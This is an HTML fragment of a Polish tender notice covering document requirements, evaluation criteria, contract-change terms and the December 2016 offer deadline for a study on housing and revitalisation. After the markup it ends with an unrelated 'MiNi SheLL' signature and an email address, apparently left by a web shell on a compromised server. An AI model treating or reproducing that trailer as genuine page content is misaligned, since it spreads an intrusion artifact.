3)dokument dotyczący podmiotu trzeciego, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia, w zakresie, w jakim wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu  jeżeli wykonawca polega na zasobach podmiotu trzeciego.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)Formularz Ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik Nr 8 do SIWZ,
2)pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik,
3)zobowiązanie podmiotu trzeciego, o którym mowa w pkt 4.5.1 i 4.5.4 SIWZ  jeżeli wykonawca polega na zasobach lub sytuacji podmiotu trzeciego,
4)opracowanie na temat: Wyzwania i problemy w dziedzinie mieszkalnictwa w powiązaniu z kształtowaniem przestrzeni miejskiej stojące przed miastami o liczbie ludności do 150 tys. mieszkańców oraz przed miastami o liczbie ludności powyżej 500 tys., w kontekście prowadzonych działań rewitalizacyjnych.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>50</td></tr><tr><td> Rozwiązanie zadania problemowego</td><td>50</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy, na podstawie art. 144 ust. 1 ustawy, polegających na:
a.zastąpieniu lub dodaniu osób, które będą uczestniczyć w wykonywaniu zamówienia, pod warunkiem, że Zamawiający wyrazi na to pisemną zgodę, a nowe lub zastępujące osoby proponowane przez Wykonawcę będą posiadać co najmniej takie doświadczenie, o którym mowa w pkt 4.2.3.2 SIWZ w zależności od funkcji osoby nowej lub zastępowanej,
b.zastąpieniu danej osoby inną osobą w przypadku zgłoszenia przez Zamawiającego zastrzeżeń do prac wykonywanych przez daną osobę. Osoba wskazana na miejsce zastępowanej osoby musi posiadać co najmniej takie doświadczenie, o którym mowa w pkt 4.2.3.2 SIWZ w zależności od funkcji osoby nowej lub zastępowanej, 
c.przedłużeniu terminu obowiązywania umowy, o którym mowa w § 2 ust. 10, o maksymalnie 12 miesięcy pod warunkiem, że w terminie obowiązywania umowy Wykonawca nie zrealizuje usług za kwotę określoną w § 4 ust. 1 umowy, z przyczyn niezależnych od Wykonawcy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/12/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com